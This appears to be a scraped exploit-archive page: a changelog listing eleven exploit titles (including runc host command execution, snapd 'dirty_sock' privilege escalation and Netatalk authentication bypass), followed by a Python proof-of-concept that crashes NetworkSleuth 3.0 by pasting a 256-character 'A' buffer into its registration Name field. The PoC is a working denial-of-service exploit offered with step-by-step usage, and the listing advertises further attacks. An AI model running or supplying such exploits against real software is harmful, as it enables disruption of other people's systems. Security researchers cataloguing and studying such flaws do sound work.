a4b18dada5
11 changes to exploits/shellcodes AirDroid 4.2.1.6 - Denial of Service NetworkSleuth 3.0 - 'Name' Denial of Service (PoC) runc< 1.0-rc6 (Docker < 18.09.2) - Host Command Execution Ubuntu snapd < 2.37.1 - Local Privilege Escalation runc < 1.0-rc6 (Docker < 18.09.2) - Host Command Execution snapd < 2.37 (Ubuntu) - 'dirty_sock' Local Privilege Escalation (1) snapd < 2.37 (Ubuntu) - 'dirty_sock' Local Privilege Escalation (2) Netatalk < 3.1.12 - Authentication Bypass Netatalk 3.1.12 - Authentication Bypass Jiofi 4 (JMR 1140 Amtel_JMR1140_R12.07) - Reflected Cross-Site Scripting Jiofi 4 (JMR 1140 Amtel_JMR1140_R12.07) - Cross-Site Request Forgery (Password Disclosure) Jiofi 4 (JMR 1140 Amtel_JMR1140_R12.07) - Cross-Site Request Forgery (Admin Token Disclosure) Rukovoditel Project Management CRM 2.4.1 - Cross-Site Scripting PilusCart 1.4.1 - 'send' SQL Injection
23 lines
No EOL
756 B
Python
Executable file
23 lines
No EOL
756 B
Python
Executable file
# -*- coding: utf-8 -*-
|
|
# Exploit Title: NetworkSleuth 3.0 - Denial of Service (PoC)
|
|
# Date: 12/02/2019
|
|
# Author: Alejandra Sánchez
|
|
# Vendor Homepage: http://www.nsauditor.com/
|
|
# Software Link: http://www.nsauditor.com/downloads/networksleuth_setup.exe
|
|
# Version: 3.0.0.0
|
|
# Tested on: Windows 10
|
|
|
|
# Proof of Concept:
|
|
# 1.- Run the python script "NetworkSleuth.py", it will create a new file "PoC.txt"
|
|
# 2.- Copy the text from the generated PoC.txt file to clipboard
|
|
# 3.- Open NetworkSleuth.exe
|
|
# 4.- Go to Register > Enter Registration Code...
|
|
# 5.- Paste clipboard in 'Name' field
|
|
# 6.- Write '1234' in 'Key' field
|
|
# 7.- Clic on button -> Ok
|
|
# 8.- Crashed
|
|
|
|
buffer = "\x41" * 256
|
|
f = open ("PoC.txt", "w")
|
|
f.write(buffer)
|
|
f.close() |